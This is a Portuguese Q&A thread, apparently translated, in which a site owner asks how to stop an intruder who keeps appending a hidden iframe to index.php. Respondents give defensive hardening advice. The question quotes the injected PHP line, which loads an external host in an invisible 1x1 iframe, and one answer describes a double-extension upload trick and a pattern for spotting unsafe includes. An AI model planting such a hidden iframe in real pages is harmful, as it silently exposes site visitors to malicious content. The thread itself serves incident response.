site php desfigurando [duplicado]

3

alguém está se intrometendo em nosso site e colocando a seguinte linha em nossa página principal (index.php) :: No seguinte código bottom.php é nosso próprio arquivo e o intruso está colocando a linha "echo <iframe .... >;" entre nosso "include_once" código.

<?include_once('bottom.php'); echo "<iframe src=\"http://clydaib.net/?click=86B26\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>"; ?>

por favor me ajude a evitar essa invasão.

Versão do PHP 5.2.9, Sistema: hansens Linux 2.4.32-grsec-opteron-peon-1.1.1 # 1 SMP Sex 21 de dezembro de 15:45:17 PST 2007 i686

    
por Community 07.08.2009 / 10:54

5 respostas

2

A primeira coisa que você deve fazer, se ainda não o fez, é bloquear o servidor tanto quanto você pode realisticamente enquanto determina qual é a causa. Em um mundo ideal, eu deixaria a máquina desligada enquanto descobria o que estava acontecendo.

Tente determinar qual foi a causa raiz disso (com o perdão do trocadilho). Se isso for algum tipo de ataque sobre http, saiba de onde veio e o que mais poderia ter sido comprometido. Pode ser um compromisso de toda a caixa?

Seu kernel tem cerca de 2 anos, seu PHP não é o mais atualizado para esse ramo. Eu acho que sua instalação do apache também não é. Você está usando um pacote do tipo CMS instalado para o site? Isso está atualizado? Você removeu algum diretório de instalação? Quais são as permissões nos arquivos?

Se fosse eu:

  1. Tire a máquina da linha
  2. Verifique se o problema está contido (possivelmente uma reinstalação para ter certeza)
  3. Assegure-se de que o software esteja atualizado e que todos os furos de segurança conhecidos sejam cobertos
  4. Restaurar conteúdo de um backup válido (você tem um backup, certo?)
  5. Veja algo como o Tripwire

Isso pode ser uma reação exagerada ao seu problema, mas até você saber a escala do "desfiguramento", você não saberá o quanto levar isso em consideração.

    
por 07.08.2009 / 12:27
1
Primeiro, verifique os logs de transferência FTP sobre index.php e verifique os IPs das conexões - eles são de países estrangeiros como China, Rússia etc. Se for verdade - altere a senha FTP, site limpo e malware - verifique todos os PCs onde senha foi usada / salvou. É bastante comum que o malware roube senhas salvas ou inclua keylogers, que são enviados ao invasor e usados para fazer com que sites distribuam / hospedem malware. Além disso, lembre-se de que o FTP envia todas as senhas em texto simples, por isso não use o Wi-Fi aberto ou outras redes não confiáveis.

se isso não funcionar, verifique o site para: a) scripts de upload de arquivos. Verifique se há caminhos de arquivos / validação de caminho. Além disso, verifique se o tipo de arquivo está realmente validado, não apenas a extensão. Apache mod mime tem "recurso" inseguro, então arquivos como O arquivo evilscript.php.gif será executado como php. Ref:

"É necessário tomar cuidado quando um arquivo com várias extensões é associado a um tipo MIME e a um manipulador. Isso geralmente resultará na solicitação do módulo associado ao manipulador. Por exemplo, se a extensão .imap é mapeado para o manipulador imap-file (de mod_imap) e a extensão .html é mapeada para o texto / html do tipo MIME; em seguida, o arquivo world.imap.html será associado ao manipulador de arquivos imap e text / html Tipo MIME. Quando ele é processado, o manipulador de arquivos imap será usado e, portanto, será tratado como um arquivo imagemap mod_imap. "

Solução: desabilite o php nos diretórios, onde os arquivos enviados são movidos.

b) inclua | require (_once). Eles podem ser usados para inclusão de arquivos remotos, então o atacante pode escrever um script php, que será executado no servidor e pode alterar / excluir arquivos. Procure por algo como include ($ _GET | $ _POST | $ _COOKIE | $ _REQUEST | $ _SERVER) (.? *) Solução: desative remote_fopen, se o seu site não precisar deles. Caso contrário, faça a mesma validação de entrada apropriada (o que seria uma coisa sensata a fazer :). Além disso, sugiro desabilitar register_globals.

c) Arquivos de entrada / remota do usuário avaliados. Lembre-se de que a entrada do usuário pode residir no banco de dados.

Além disso, verifique o seu site em busca de backdoors, os chamados "shells". A coisa mais segura a fazer é restaurar do backup seguro conhecido:)

    
por 07.08.2009 / 12:57
0

Existem várias maneiras de fazer isso. Existe algum campo de Entrada na sua página principal ou (outro) que possa ser analisado incorretamente para tentativas de exploração?

Primeiro, torne os arquivos PHP legíveis pelo servidor, mas não graváveis. Em segundo lugar, verifique seus vários campos de entrada para possível exploração.

    
por 07.08.2009 / 11:36
0

é bastante popular recentemente com o roubo de senhas salvas por malware [na maioria das vezes do comandante total] e o envio dessas credenciais para o centro de comando. mais tarde, em outras máquinas, conecte-se via ftp, baixe index.php / html e acrescente js / php malicioso. tudo automatizado.

    
por 07.08.2009 / 12:09
0

Uma forma de limitar ataques a aplicativos da web no apache é carregar e ajustar o mod_security do apache

Link: veja este Introdução do mod_security artigo

    
por 07.08.2009 / 12:42